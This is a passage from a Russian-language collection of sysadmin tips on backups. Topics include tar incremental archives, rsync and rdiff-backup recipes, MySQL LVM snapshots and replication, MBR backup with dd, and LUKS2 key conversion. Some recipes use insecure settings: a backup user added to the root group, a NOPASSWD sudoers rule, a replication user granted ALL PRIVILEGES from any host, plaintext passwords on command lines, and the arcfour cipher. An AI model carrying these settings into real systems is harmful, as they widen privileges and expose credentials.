#diff = diff -y -W 79 --suppress-common-lines # Сохраняем лог с результатами работы в отдельном файле log = true logfile = ./sync.log При необходимости синхронизировать описанные в файле конфигурации директории, выполняем: unison test

Создание инкрементального архива с помощью утилиты tar (доп. ссылка 1) (доп. ссылка 2) Автор: sanmai [комментарии]

В самом простом виде инкрементальный архив с помощью tar делается так: tar --create --file=`date +%s`.tbz2 --bzip --listed-incremental=example.snar --verbose example/ Кратко: tar -cvjg example.snar -f `date +%s`.tbz2 example/ Развертывается архив через распаковку всех составляющих архивов по очереди, от самых старых к самым новым. В простейшем случае так: tar --extract --incremental --file level0.tar tar --extract --incremental --file level1.tar tar --extract --incremental --file level2.tar Или, например, так: for i in *.tbz2; do tar -xjGf "$i"; done; Если нужно извлечь только конкретные каталоги из архива: tar -xjGf levelX.tar --wildcards 'example/foo*' 'example/bar*' При использовании следующего скрипта, архив нулевого уровня будет создаваться раз в неделю или раз в месяц, в зависимости от того какая строка раскомментирована: #!/bin/sh SOURCE="$1" test -d "$SOURCE" || exit 1 DEST_DIR=`date +%G-%V`; #weekly #DEST_DIR=`date +%Y-%m`; #monthly #DEST_DIR=`date +%Y`-$(( (`date +%m`-1)/3+1 )); #quarterly mkdir -p $DEST_DIR; shift; tar --create "$@" --preserve-permissions --totals --bzip \ --file="$DEST_DIR"/`date +%F-%s`.tbz2 \ --listed-incremental="$DEST_DIR"/backup.snar \ --no-check-device --exclude-vcs \ --exclude-tag-under=access.log --exclude='*.log' \ --exclude-caches --exclude-tag-under=IGNORE.TAG "$SOURCE" Проверить работу этого скрипта можно, например, так: ./backup.sh example/ -v Для некоторых версий tar наблюдается крах при одновременном использовании --exclude-caches и --exclude-tag=, в этом случае --exclude-caches можно заменить на --exclude-tag=CACHEDIR.TAG.

Резервное копирование MySQL с использованием LVM снапшотов в Debian Linux (доп. ссылка 1) [комментарии]

Утилита mylvmbackup (http://lenz.homelinux.org/mylvmbackup/) позволяет автоматизировать создание резервных копий БД MySQL с минимальным временем простоя базы. Процесс создания бэкапа состоит из следующих фаз: установка блокировки на таблицы, инициирование сброса кэшей на диск, создание LVM снапшота директории с MySQL таблицами, снятие блокировки. Так как время создания снапшота очень мало, простой базы сводится к минимуму при полном сохранении целостности. Пример использования утилиты для системы на которой уже работает MySQL, директория с БД (/var/lib/mysql) размещена на LVM разделе и в системе доступен раздел /dev/sdb на котором достаточно для создания временных LVM снапшотов. # df -h ... /dev/mapper/server1-mysql 8.9G 170M 8.3G 2% /var/lib/mysql Имя LVM группы server1, имя раздела с данными MySQL - mysql. # pvdisplay --- Physical volume --- PV Name /dev/sda5 VG Name server1 PV Size 29.52 GB / not usable 3.66 MB ... # vgdisplay --- Volume group --- VG Name server1 System ID Format lvm2 ... # lvdisplay --- Logical volume --- LV Name /dev/server1/mysql VG Name server1 ... Диск /dev/sdb имеет один раздел /dev/sdb1, занимающий все пространство диска. Подключаем его к имеющемуся LVM группе server1 с целью увеличения свободного места, которое потребуется для работы со снапшотами. Дополнительные LVM разделы создавать не нужно. # pvcreate /dev/sdb1 # vgextend server1 /dev/sdb1 Устанавливаем пакет mylvmbackup: # aptitude install mylvmbackup Изучаем руководство по mylvmbackup и при необходимости меняем файл конфигурации /etc/mylvmbackup.conf под свои нужды: $ man mylvmbackup По умолчанию бэкапы будут сохраняться в директорию /var/cache/mylvmbackup/backup. Простейшая команда для создание резервной копии (параметры можно указать в файле конфигурации) MyISAM таблиц: mylvmbackup --user=root --password=пароль --mycnf=/etc/mysql/my.cnf \ --vgname=server1 --lvname=mysql --backuptype=tar Пример для InnoDB таблиц: mylvmbackup --user=root --password=пароль --innodb_recover --skip_flush_tables \ --mycnf=/etc/mysql/my.cnf --vgname=server1 --lvname=mysql --backuptype=tar В опции --vgname указываем имя LVM группы, а в опции --lvname имя LVM раздела с данными. После выполнения команды проверяем корректность создания резервной копии: ls -l /var/cache/mylvmbackup/backup -rw-r--r-- 1 root root 246847 2010-01-27 19:17 backup-20100127_191658_mysql.tar.gz В созданном tar.gz файле находятся две директории: backup с архивом таблиц, который можно просто распаковать в рабочую директорию /var/lib/mysql при проведении восстановления данных. backup-pos с копией файла конфигурации my.cnf.

Автоматическое создания бэкапа с задействованием DHCP сервера (доп. ссылка 1) Автор: scofield [комментарии]

Ниже представлен перевод руководства (http://howtoforge.org/automated-backups-using-dhcpd-on-ubuntu) по настройке резервного копирования удаленных машин, с привязкой к обращению клиента к dhcpd серверу. Примеры настройки справедливы для Ubuntu Linux, для других дистрибутивов могут потребоваться незначительные очевидные изменения. Конфигурирование сервера Настройка dhcp3. В файл /etc/dhcp3/dhcps.conf добавляем: on commit { execute ( "/etc/dhcp3/startbackup.sh", "start", binary-to-ascii(10,8,".",leased-address) ); } Создаем скрипт /etc/dhcp3/startbackup.sh, указанный в файле настройки dhcp. #!/bin/bash case "$1" in start) sudo -u backup /etc/dhcp3/rsync.sh $2 ;; *) ;; esac exit 0 Создаем скрипт /etc/dhcp3/rsync.sh: #!/bin/bash nohup rsync -azuvb backup@$1:/home /backup/$1 & Создаем директорию для хранения бэкапов: sudo mkdir /backup Создаем пользователя "backup" sudo useradd backup sudo chown backup:backup /backup Генерируем ssh-ключи: ssh-keygen -t rsa Копируем ключи на все машины, с которых будет производиться резервное копирование ("[host]" заменяем на имя машины): ssh-copy-id -i ~/.ssh/id_rsa backup@[host] Запускаем sudo visudo и добавляем строку, позволяющую организовать запуск /etc/dhcp3/startbackup.sh из dhcpd от имени пользователя backup dhcpd ALL=(backup)NOPASSWD: /etc/dhcp3/startbackup.sh, /etc/dhcp3/rsync.sh Настройка AppArmor В файле /etc/apparmor.d/usr.sbin.dhcpd3 добавляем "/etc/dhcp3/startbackup.sh Uxr,", заменив /etc/dhcp3/ r, /etc/dhcp3/** r, /etc/dhcpd.conf r, /etc/dhcpd_ldap.conf r, на /etc/dhcp3/ r, /etc/dhcp3/** r, /etc/dhcp3/startbackup.sh Uxr, /etc/dhcpd.conf r, /etc/dhcpd_ldap.conf r, Перезапускаем сервисы apparmor и dhcp3-server sudo /etc/init.d/apparmor restart sudo /etc/init.d/dhcp3-server restart Настройка клиента Создаем пользователя "backup": sudo useradd backup sudo usermod -G root Тестируем настройки sudo dhclient рабочий_сетевой_интерфейс После чего, на сервере должна быть создана резервная копия данных с машины клиента

Создание бекапа OpenVZ контейнера (доп. ссылка 1) [обсудить]

Для создания инкрементального бэкапа по сети можно использовать готовый скрипт ezvzdump, суть работы которого в создании копии через rsync, заморозке окружения с сохранением дампа состояния (vzctl chkpnt $VEID --suspend ), копированию сохраненного дампа и изменившихся с момента последнего rsync файлов, продолжению работы остановленного OpenVZ контейнера (vzctl chkpnt $VEID --resume). Для создания целостных дампов можно воспользоваться утилитой vzdump: vzdump 777 После этого образ текущего состояния OpenVZ контейнера будет сохранен в /vz/dump/ Утилита vzdump также поддерживает схему suspend/rsync/resume: vzdump --suspend 777 А также можно сохранить дамп почти мгновенно методом suspend/LVM2 snapshot/resume: vzdump --dumpdir /space/backup --snapshot 777 В итоге будет сформирован архив /space/backup/vzdump-777.tar, который можно восстановить командой: vzdump --restore /space/backup/vzdump-777.tar 600

Сохранение версий небольших проектов (доп. ссылка 1) Автор: Марецкий Александр [комментарии]

Допустим Вы пишете скрипт или маленький проект из нескольких файлов. Соответственно возникает желание периодически сохранять результат своих трудов, чтобы в случае необходимости откатиться на шаг или два назад. Для крупного проекта идеально подойдет система контроля версий, а для маленькой задачи подойдет и небольшой shell-скрипт. Для начала использования скрипта достаточно: - переименовать save.sh в просто save - для удобства набора в терминале - разместить его где-нибудь в пределах охвата переменной окружения $PATH (тоже для удобства) - определить в начале скрипта переменной SAVEDIR путь к желаемой директории хранения файлов Вот этот shell-скрипт: #!/bin/sh SAVEDIR="${HOME}/save" # where save backups LIMIT_BYTES=1048576 # set 1Mb limit SCRIPT="save" VERSION="20090903" if test "${1}" then echo "${SCRIPT} version ${VERSION}" >&2 echo "Saves backup of whole current directory" >&2 exit 1 fi err() { echo "${SCRIPT}: ERROR: ${1}" >&2 exit 1 } #### check save directory test -d "${SAVEDIR}" || mkdir "${SAVEDIR}" 2>/dev/null test -d "${SAVEDIR}" || err "failed to create directory: ${SAVEDIR}" #### check size DIR="$(basename $(pwd))" DIR_SIZE_BYTES=$(du -s . | awk '{print $1}') test ${DIR_SIZE_BYTES} -gt ${LIMIT_BYTES} && err "size (${DIR_SIZE_BYTES}) of ${DIR} is greater than limit of ${LIMIT_BYTES}" #### saving cd .. || err "FAILED" tar cpzf "${SAVEDIR}/${DIR}.$(date +%Y%m%d%H%M%S).tar.gz" "${DIR}" || err "failed to create archive" echo "saved: ${DIR}" Например, Вы пишете какой-то хороший ценный скрипт, соответственно предполагаем что у Вас открыт терминал и рабочей директорией является каталог с разрабатываемым скриптом или документов: $ pwd /home/user/tmp/mysmallproject $ ls -l итого 12 -rwxr-xr-x 1 user users 895 2009-09-08 00:52 project.c -rwxr-xr-x 1 user users 170 2009-09-08 00:52 project.h -rwxr-xr-x 1 user users 865 2009-09-08 00:48 project.sh Тогда для создания бэкапа просто наберите "save": $ save saved: mysmallproject Все, копия файлов сохранена. Посмотрим на нее: $ ll /home/user/save/my* -rw-r--r-- 1 user users 1,1K 2009-09-08 00:54 /home/user/save/mysmallproject.20090908005453.tar.gz Видим что скрипт в указанной директории создает архив текущего рабочего каталога и в имени архива дата до секунд. Это удобно, архивы аккуратно выстраиваются по дате. В скрипте еще предусмотрена переменная LIMIT_BYTES, значение которой ограничивает максимальный размер текущей директории (рекурсивно, до архивирования). Это для того чтобы случайно не архивировать что-то крупное.

Резервное копирование почтового ящика Gmail в Linux [комментарии]

Вариант 1. GUI интерфейс. Загружаем с сайта http://www.gmail-backup.com/download программу gmail-backup. Убедимся, что в системе установлен Python 2.5, библиотеки wxWidgets и модуль wxPython (в Debian/Ubuntu пакеты python2.5 python-wxversion). Активируем "Включить IMAP" в настройках Gmail доступ через IMAP (Settings / Forwarding and POP/IMAP или Настройки / Пересылка и POP/IMAP). Для начала резервного копирования запускаем GUI интерфейс и вводим необходимые параметры аккаунта: ./gmail-backup-gui.sh Автоматизировать загрузку резервных копий можно через поставляемый в комплекте с gmail-backup скрипт: ./gmail-backup.sh backup имя_папки user@gmail.com пароль Для выборочного бэкапа нужно использовать: ./gmail-backup.sh backup dir user@gmail.com password 20070621 20080101 Для восстановления данных: ./gmail-backup.sh restore dir user@gmail.com password Для копирования только новых данных, накопившихся с момента прошлого бэкапа: ./gmail-backup.sh backup dir user@gmail.com password --stamp Как видно у скрипта имеется существенная проблема - необходимость указания пароля прямо в командной строке, что с точки зрения безопасности неприемлимо. Исправить ситуацию не получается, пакет распространяется только в бинарном виде. Вариант 2. Использование пакета getmail: Ставим getmail (http://pyropus.ca/software/getmail/): sudo apt-get install getmail4 Создаем 2 директории: .getmail для хранения настроек и директорию gmail-archive для хранения бэкапа. mkdir ~/.getmail mkdir ~/gmail-backup Создаем файл конфигурации ~/.getmail/getmail.gmail: [retriever] type = SimpleIMAPSSLRetriever server = imap.gmail.com username = user@gmail.com password = password [destination] type = Maildir path = ~/gmail-backup/ # Если вместо maildir нужно использовать формат mbox: # type = Mboxrd # path = ~/gmail-backup/gmail.mbox [options] verbose = 2 message_log = ~/.getmail/gmail.log Запускаем копирование писем: getmail -r ~/.getmail/getmail.gmail

Использование rdiff-backup (доп. ссылка 1) Автор: Yuri Trofimov [комментарии]

Иногда при проведении резервного копирования, бэкапов, не требуется вся мощь систем уровня предприятия, таких как, например, Bacula. Но, с другой строны, не совсем подходят и простые самописные скрипты. Как всегда, требуется что-то среднее. Вот тут-то и следует обратить внимание на rdiff-backup (http://www.nongnu.org/rdiff-backup/). rdiff-backup - это кучка скриптов на питоне, которые хранят историю файлов, сохраняя на диске только их отличия. rdiff-backup бэкапит один каталог в другой. Целевой каталог в результате содержит копию исходного каталога. Различия текущей и предыдущей копий исходного каталога сохраняются в отдельном месте, поэтому можно восстановить и удаленные файлы. rdiff-backup может также работать через конвейер с ограничением полосы пропускания, подобно rsync. Вы можете использовать rdiff-backup и ssh для безопасного копирования данных на удаленную систему, причем передаваться будут только различия. Система корректно работает с символическими ссылками, файлами устройств, правами и т.д. и может быть использована для копирования всей файловой системы. На сервере-хранилище-бэкапов и всех серверах, учавствующих в резервном копировании необходимо установить rdiff-backup. Авторизацию для ssh делаем с помощью AuthorizedKeysFile. Если на хосте-хранилище-бэкапов используется нестандартный порт для ssh, то на хосте откуда бэкапим (клиенте) делаем файл ~/.ssh/config Host host.tld Port 3333 Protocol 2 Compression yes Пример скрипта Скрипт бэкапит базу MySQL и каталоги виртуальных хостов с клиента (client.tld) на сервер бэкапов (host.tld). Чтобы быстро находить нужный бэкап, на хосте-хранилище-бэкапов создаются каталоги по именам хостов-клиентов и далее уже в каждом из них хранится дерево каталогов, как и в оригинале. #!/bin/sh TMPDIR="/tmp/mysqldump" DUMPFILE="${TMPDIR}/client.tld.mysqldump" echo -e "\nmysqldump start...\n" mkdir "${TMPDIR}" /usr/bin/mysqldump --single-transaction --quick --skip-extended-insert \ -uUSER -pPASSWORD NAMEDB > "${DUMPFILE}" /usr/bin/rdiff-backup --print-statistics "${TMPDIR}" \ user@host.tld::"client.tld/mysqldump" rm -f "${DUMPFILE}" rmdir --ignore-fail-on-non-empty "${TMPDIR}" echo -e "\n\nstart /var/www/vhosts backup ...\n" /usr/bin/rdiff-backup --create-full-path --exclude-symbolic-links --exclude-sockets \ --exclude-special-files --exclude-fifos --exclude-device-files --no-hard-links \ --print-statistics \ "/var/www/vhosts" user@host.tld::"client.tld/var/www/vhosts" В cron'е можно изобразить что-нибудь типа: /root/bin/mybackup.sh | \ /bin/mail -c "admin@domain.com" -s "`uname -n` backup report" root@localhost Вы будете получать примерно такие отчеты: --------------[ Session statistics ]--------- StartTime 1227924257.00 (Sat Nov 29 02:04:17 2008) EndTime 1227924381.73 (Sat Nov 29 02:06:21 2008) ElapsedTime 124.73 (2 minutes 4.73 seconds) SourceFiles 2883 SourceFileSize 31441627 (30.0 MB) MirrorFiles 2883 MirrorFileSize 31441627 (30.0 MB) NewFiles 0 NewFileSize 0 (0 bytes) DeletedFiles 0 DeletedFileSize 0 (0 bytes) ChangedFiles 0 ChangedSourceSize 0 (0 bytes) ChangedMirrorSize 0 (0 bytes) IncrementFiles 0 IncrementFileSize 0 (0 bytes) TotalDestinationSizeChange 0 (0 bytes) Errors 0 Восстановление Если что-то случится с rdiff-backup, то восстановить данные можно простым копированием, и это важно. Пример стандартной команды для восстановления (где host.tld - хост-хранилище-бэкапов) : rdiff-backup -r now user@host.tld::"client.tld/var/www/vhosts" /tmp/vhosts Восстановление файлов в состоянии как 10 дней назад : rdiff-backup -r 10D user@host.tld::"client.tld/var/www/vhosts" /tmp/vhosts см. также секцию TIME FORMATS в man. Дополнительно Существует RdiffWeb для web-доступа к резервным копиям, сделанным утилитой rdiff-backup. Дополнение от редактора: При использовании стандартного rsync, для отдельного сохранения изменений накопившихся за день в отдельной директории, можно использовать примерно такой скрипт: snapshot_dir="/snapshot/backup_snap/`date \+\%Y_\%m_\%d`" mkdir $snapshot_dir /usr/local/bin/rsync -a -v --delete --max-delete=1000 --hard-links \ --delete-excluded --exclude-from=/etc/rsync_backup.exclude / /backup \ --backup --backup-dir=$snapshot_dir В /etc/rsync_backup.exclude добавляем список исключений ( в конце "/*" чтобы директория создалась): /backup/* /snapshot/* /mnt/* /var/log/* /proc/* ... и т.п. Для чистки снапшотов старее 30 дней, в cron добавляем: find /snapshot/backup_snap/ -type d -maxdepth 1 -mtime +30 -exec rm -rf {} \;

Полезные рецепты при работе с rsync [комментарии]

1. Если копируемая директория заканчивается слэшем, то файлы будут скопированы в каталог назначения относительно корня изначально заданной директории. Пример: rsync -a /dir1/dir2 /dir3 - будет создана иерархия /dir3/dir2/файлы rsync -a /dir1/dir2/ /dir3 - будет создана иерархия /dir3/файлы 2. При транзитном переносе файлов через дополнительную машину не нужно забывать, что опция "-a" подразумевает трансляцию имен пользователей и групп в локальные uid/gid, т.е. скопировав данные с первой машины на вторую, а потом со второй на локально подключенный жесткий диск, предназначенный для третьей машины, получим на третьей машины совершенно иных владельцев каталогов и файлов. Не тех которые были в /etc/password первой машины, а тех, которые в данным момент в /etc/password второй машины (изменятся типовые пользователи, например, web, ftp, dhcp, номера uid/gid которых отличаются на двух машинах). Чтобы этого не произошло нужно использовать опцию "--numeric-ids". 3. Особенности задания файлов исключений ("--exclude-from=файл" или " --exclude маска1 --exclude маска2"). Для того чтобы исключить из бэкапа содержимое директории, но саму директорию оставить, нужно указать в "exclude" файле "/dir/*", а не "/dir/" (под "/dir" подпадет и /dir123, и файл /dir.txt, для директорий указание "/" в конце обязательно). Звездочка ("*") в шаблоне действует только на имя файла/каталога, чтобы маской охватывалась часть пути, включая "/", нужно писать "**". Шаблон не начинающийся с '/' проверяется с конца строки. Например "/dir/test" будет проверен c начала пути, а "dir/test.txt" или "*.log" с конца. Если необходимо исключить все поддиректории в /dir, кроме /dir/best, в список исключений нужно поместить: + /dir/best/ - /dir/* При переборе содержимого "exclude" файла, срабатывает первое правило под которое подпадает текущий путь, не важно исключающие или нет. В качестве корня выступает директория назначения, т.е. "/" в "exclude" файле = "/dir3/dir2" или "/dir3" из первого совета. 4. Запрещение двойного сжатия при передаче данных по SSH. rsync при задании опции "-z" более оптимально сжимает передаваемые данные, поэтому сжатие средствами ssh можно отключить: export RSYNC_RSH="ssh -c arcfour -o Compression=no -x" rsync -a -z -v --bwlimit=16 /dir1 /dir2 user@test.ru:/dir3/ где, --bwlimit=16 ограничивает пропускную способность при копировании бэкапа в 16 Кбайт в сек. 5. Изменение уровня точности при сравнении локального и удаленного времени модификации файлов. Например, для того чтобы считать идентичными файлы время модификации которых отличается на 1 секунду необходимо указать: "--modify-window=1". 6. Пример сохранения истории изменения данных. При этом старые измененные или удаленные файлы не теряются а перемещаются в директорию /snapshot/дата. #!/bin/sh snapshot_dir="/snapshot/`date \\+\\%Y_\\%m_\\%d`" mkdir $snapshot_dir rsync -a -v --delete --max-delete=1000 --hard-links \\ --delete-excluded --exclude-from=/etc/rsync_backup.exclude \\ --backup --backup-dir=$snapshot_dir \\ / /backup RETCODE=$? if [ $RETCODE -ne 0 ]; then echo "Err code=$RETCODE"| mail -s "FATAL RSYNC BACKUP" admin@test.ru fi echo RET: $RETCODE /bin/chmod 0700 /backup /bin/chmod 0700 /snapshot 7. Некоторые полезные опции. -v - говорливость, выводит имена обрабатываемых файлов; -a - работа в режиме архивирования, сохраняются права доступа и информация о владельцах; -H - сохранять жесткие ссылки, оставляя их на другом конце бэкапа; -x - не выходить за пределы текущей точки монтирования; --progress - показывать сколько процентов осталось до завершения и скорость передачи; --delete - удалять из бэкапа файлы, которых уже нет на стороне источника. --delete отличается от --delete-after тем, что удаление производится вначале, а не на завершающей стадии процесса бэкапа. --delete-after работает быстрее, так как не требует лишней стадии обхода списка файлов, но требует использования опции --force для обработки таких ситуаций как удаление файла и появление диретории с тем же именем; --delete-excluded - удалять части которые уже есть на стороне бэкапа, но появились в списке исключения; -n - режим тестирования, реально никаких действий по копированию не производится, только эмуляция; -c - использование сверки по контрольным суммам, а не по времени изменения и размеру; --compare-dest=DIR - сохранять новые и измененные файлы в отдельной директории, не трогая на время копирования основную директорию назначения, в конце - разом, путем переименования, обновить содержимое бэкапа; --link-dest=DIR - использовать жесткие ссылки на файлы в DIR, например, для создания подобия снапшотов; --ignore-errors - продолжать копирование и удаление после появления ошибок; --max-delete - ограничение максимально числа удаляемых за один раз файлов и каталогов; -A - сохранять не только права доступа, но и ACL; --files-from=FILE - задать список директорий и файлов для бэкапа в файле;

Синхронизация файлов и содержимого БД MySQL на резервный сервер (доп. ссылка 1) Автор: neiro [комментарии]

Есть два сервера под Linux/FreeBSD: СУБД MySQL + некое приложение, задача - синхронизировать БД и данные. За синхронизацию данных MySQL отвечает mysql replication, данные синхронизируются с мастера на слейв. Делаем на мастере: в my.cnf добавляем строки log-bin = /var/log/mysql/mysql-bin.log binlog-do-db=databasename server-id=1 перезагружаем MySQL, добавляем пользователя для репликации: GRANT ALL PRIVILEGES ON databasename.* TO 'slave_user'@'%' IDENTIFIED BY 'slave_password'; FLUSH PRIVILEGES; далее выполняем команду: USE databasename; FLUSH TABLES WITH READ LOCK; SHOW MASTER STATUS; и вывод этой команды для нас важен, надо его куда-нибудь записать: | File | Position | Binlog_do_db | Binlog_ignore_db | | mysql-bin.001 | 10 | databasename | | теперь делаем дамп базы: mysqldump -u slave_user -pslave_password --opt databasename > databasename.dump и наконец убираем лок с базы в MySQL: UNLOCK TABLES; Теперь на слейве: Создаём базу: mysqladmin create databasename -p Востанавливаем базу из дампа: mysql -u slave_user -pslave_password databasename < databasename.dump в my.cnf добавляем строки: server-id=2 master-host=XX.XX.XX.XX # IP адрес мастер-сервера master-user=slave_user master-password=slave_password master-connect-retry=60 replicate-do-db=databasename перегружаем MySQL и добавляем чудесные данные из волшебной комманды: SLAVE STOP; CHANGE MASTER TO MASTER_HOST='XX.XX.XX.XX', MASTER_USER='slave_user', MASTER_PASSWORD='slave_password', MASTER_LOG_FILE='mysql-bin.001', MASTER_LOG_POS=10; START SLAVE; готово, теперь проверяем, добавляем запись в мастер, на слейве она должны отреплицироваться. Понятно, что изменять данные можно только на мастере, слейв работает только на чтение. Для синхронизации данных имеет смысл использовать rsync, очень интересный протокол/приложение. Может синхронизировать инкрементально и с сжатием. На мастер сервере в rsyncd.conf добавляем: read only = yes # во избежание ;-) hosts allow = YY.YY.YY.YY # IP адрес слэйв-сервера [somelabel] path = /path/to/apllication/folder # где лежит приложение auth users = replica_user # юзер только для репликации в rsync, не системный пользователь secrets file = /path/to/rsync/rsync.secret # где лежит файл с паролем для replica_user, # только пароль и ничего больше на слейве - команда для синхронизации, можно добавить в cron с нужной периодичностью: /path/to/rsync -avz --exclude-from=/path/to/rsync.exclude \ --password-file /path/to/rsync.secret \ rsync://replica_user@XX.XX.XX.XX:873/somelabel /path/to/application где: rsync.exclude - файл в котором перечислены, какие файлы (конкретно или по маске) не синхронизировать rsync.secret - файл с секретным паролем для replica_user ХХ.ХХ.ХХ.ХХ - IP мастер-сервера, 873 - дефолтный порт для демона somelabel - метка из rsyncd.conf с мастера /path/to/application - путь куда класть данные.

Бэкап больших MyISAM таблиц без длительной блокировки в MySQL (доп. ссылка 1) Автор: jabrusli [комментарии]

mysqldump лочит таблицы на запись и во время дампа база фактически простаивает. Решения: 1. Репликация и бэкап со слейва; 2. mysqlhotcopy, делает "read lock" на и копируются файлы баз, т.е.: FLUSH TABLES WITH READ LOCK; // копировать файлы MyISAM таблиц UNLOCK TABLES; FLUSH TABLES WITH READ LOCK может занять много времени т.к. он будет ждать окончания выполнений всех запущенных запросов. 3. Минимизация блокировки через использование снапшотов ФС: FLUSH TABLES WITH READ LOCK; Делаем снэпшот ФС, где лежат базы мускула UNLOCK TABLES; Копируем директории с базой или отдельные таблицы Отцепляем снэпшот Скрипт для Linux (использует LVM снапшот): http://lenz.homelinux.org/mylvmbackup/ Cкрипт для FreeBSD: (echo "FLUSH TABLES WITH READ LOCK;"; echo "\! ${MOUNT} -u -o snapshot /${SNAPPART}/.snap/backup /${SNAPPART}"; echo "UNLOCK TABLES;" ) | ${MYSQL} --user=root --password=`${CAT} ${MYSQLROOTPW}`

Как получить информацию о разделах диска для бэкапа [комментарии]

Linux: fdisk -l /dev/hda > partitions.txt cat /proc/partitions BSD: disklabel da0s1 > partitions.txt Для восстановления или клонирования: fdisk -BI -v -b /boot/mbr da1 # Слайс на весь диск. disklabel -R -B -r da1s1 partitions.txt Параметры FS, без ее реального создания можно посмотреть через: newfs -N /dev/da0s1e Для визуального создания или редактирования разделов удобно использовать /stand/sysinstall (Configure/Fdisk иди Label), в качестве точки монтирования не забыть добавить перед именем "/mnt" и создать директорию для монтирования.

Как сделать бэкап таблицы разделов диска [обсудить]

Бэкап MBR: dd if=/dev/hda of=mbr_backup.bin bs=1 count=512 Для восстановления всего MBR поменять if/of местами. Таблица разделов находится в MBR по смещению 0x01BE (446) и состоит из 4 записей по 16 байт. Для восстановления только таблицы разделов: dd if=mbr_backup.bin of=/dev/устройство bs=1 count=64 skip=446 seek=446

Полный бэкап на дополнительный диск при помощи rsync (доп. ссылка 1) [комментарии]

Резервный диск монтируем как /backup в read-only режиме. По крону еженощно запускаем скрипт следующего содержания: /sbin/mount -u -w /backup # пепреводим раздел в rw режим, mount "-o remount,rw /backup" для Linux /usr/bin/rsync -a --delete --delete-excluded --max-delete=200 \ --exclude-from=/etc/ex_files_list.txt / /backup RETCODE=$? if [ $RETCODE -ne 0 ]; then echo "Err code=$RETCODE"| mail -s "RSYNC BACKUP ERROR" alert@test.ru fi /sbin/mount -u -r /backup # раздел обратно в ro, mount "-o remount,ro /backup" для Linux Если backup-диск большой, лучше вести две полные копии, на случай краха во время бэкапа (или см. опцию --backup); При бэкапе на другой сервер: rsync [...опции как выше] --compress --bwlimit=100 --timeout=120 \ -e ssh source/ login@backuphost:/backup/node1 Список файлов для исключения из бэкапа (ex_files_list.txt): /backup /mnt /proc /tmp /var/log /usr/obj /usr/src /usr/tmp /usr/ports /usr/local/apache/logs

Как лучше бэкапить данные баз в PostgreSQL [обсудить]

Полный бэкап всех баз: pg_dumpall [-s] [-D] > backup_file Выборочный бэкап: pg_dump [-s] [-D] [-t table] db > backup_file -s - записывается только информация о структуре базы, без данных. -D - формируется бэкап данных в виде INSERT команд. -t table - бэкап выборочных таблиц.

Советы по бэкапу данных в MySQL [комментарии]

Бэкап структуры: mysqldump --all --add-drop-table [--all-databases] --force [--no-data] [-c] \ --password=password --user=user [база] [таблицы] > backup_file ( -c - формировать в виде полных INSERT. --all-databases - бэкап всех баз, --no-data - бэкап только структуры таблиц в базах, [таблицы] - бэкапить только указанные таблицы.) Восстановление: mysql < backupfile (для прямой вставки из текстового файла можно воспользоваться mysqlimport) (для анализа структуры базы, например, списка таблиц: mysqlshow <база>)

Как 1 в 1 скопировать файловую систему. [комментарии]

Копируем /usr в текущую директорию: dump -0u -f - /usr | restore -r -f - Для полного бэкапа /usr на ленту: dump -0u -f /dev/st0 /usr

Файловые системы

Перевод шифрованного раздела на LUKS2 и более надёжную функцию формирования ключа (доп. ссылка 1) [комментарии]

В шифрованных разделах LUKS1 в качестве функции формирования ключа (KDF, Key Derivation Function) на основе заданного пользователем пароля применяется функция PBKDF2, не обеспечивающая должную стойкость от подбора с использованием GPU. В LUKS2 в качестве KDF появилась возможность использования гибридной хэш-функции argon2id, которая помимо потребления вычислительных ресурсов, затрудняет распараллеливание и требует значительного объёма памяти. Например, подбор KDF-функции PBKDF2, рассчитанной на потребление CPU, может эффективно распараллеливаться на GPU Geforce 4090 c 16384 вычислительными блоками, но в случае применения argon2id подбор упирается в размер видеопамяти (при потреблении 1 ГБ на каждую операцию подбора, на GPU с 24 ГБ памяти можно обеспечить лишь подбор в 24 параллельных потока). Переключение с LUKS1 на LUKS2 с argon2id. Определяем на каком устройстве находится шифрованный раздел: lsblk ... └─nvme0n1p3 259:3 0 474,8G 0 part └─nvme0n1p3_crypt 253:0 0 474,8G 0 crypt ├─vgubuntu--mate-root │ 253:1 0 473,8G 0 lvm /var/snap/firefox/common/host-hunspell │ / └─vgubuntu--mate-swap_1 253:2 0 980M 0 lvm [SWAP] Сохраняем резервную копию заголовка LUKS и затем копируем на внешний носитель, чтобы иметь возможность восстановить состояние. sudo cryptsetup luksHeaderBackup /dev/nvme0n1p3 --header-backup-file /tmp/luksheader Проверяем версию LUKS: sudo cryptsetup luksDump /dev/nvme0n1p3 ... Version: 1 ... PBKDF: pbkdf2 Если версия 1, то необходимо обновить заголовок до LUKS2. sudo cryptsetup convert /dev/nvme0n1p3 --type luks2 Проверяем, что с новым заголовком система по-прежнему грузится и если возникли проблемы восстанавливаем старый заголовок командой sudo cryptsetup luksHeaderRestore /dev/nvme0n1p3 --header-backup-file путь_к_скопированному_luksheader Ещё раз выполняем cryptsetup luksDump и проверяем алгоритм в секции Keyslots, если указано "pbkdf2" или "argon2i" следует обновить его до "argon2id": sudo cryptsetup luksConvertKey /dev/nvme0n1p3 --pbkdf argon2id Проверяем результат: sudo cryptsetup luksDump /dev/nvme0n1p3 ... Version: 2 ... Keyslots: 0: luks2 ... PBKDF: argon2id ... 0: luks2 ... PBKDF: argon2id ...

Шифрование данных на существующем разделе ext4 без его переформатирования (доп. ссылка 1) (доп. ссылка 2) [комментарии]

Можно отметить два основных способа организации шифрования данных в уже существующей файловой системе Ext4, не требующие пересоздания раздела с переносом данных из резервной копии. Первый способ заключается в использовании встроенных в Ext4 возможностей по шифрованию отдельных каталогов, а второй в использовании команды "cryptsetup reencrypt" для прозрачного переноса ФС на новый шифрованный раздел LUKS. В любом случае создание полной резервной копии перед выполнением предложенных манипуляций обязательно. Первый способ наиболее простой и безопасный, но он ограничен использованием отдельных шифрованных каталогов, в которые можно перенести конфиденциальные данные, требующие защиты. Шифрование в Ext4 поддерживается при использовании как минимум ядра Linux 4.1 и утилит 2fsprogs 1.43. Выставляем в суперблоке раздела c ФС ext4 флаг поддержки шифрования (в нашем случае /dev/sda1): sudo tune2fs -O encrypt /dev/sda1 Создаём каталог, в котором будут храниться зашифрованные данные текущего пользователя: mkdir -p /secret/home/user Генерируем случайную salt-последовательность для последующего шифрования и сохраняем её в отдельный файл: echo 0x`head -c 16 /dev/urandom | xxd -p` > /home/user/.crypt_salt Создаём на базе данной salt-последовательности ключ для шифрования, указав для него пароль: e4crypt add_key -S /home/user/.crypt_salt Enter passphrase (echo disabled): Added key with descriptor [f467134ca2c48c33] Проверяем добавление ключа командой "keyctl show", которая поставляется в пакете keyutils. Активируем шифрование для каталога /secret/home/user, 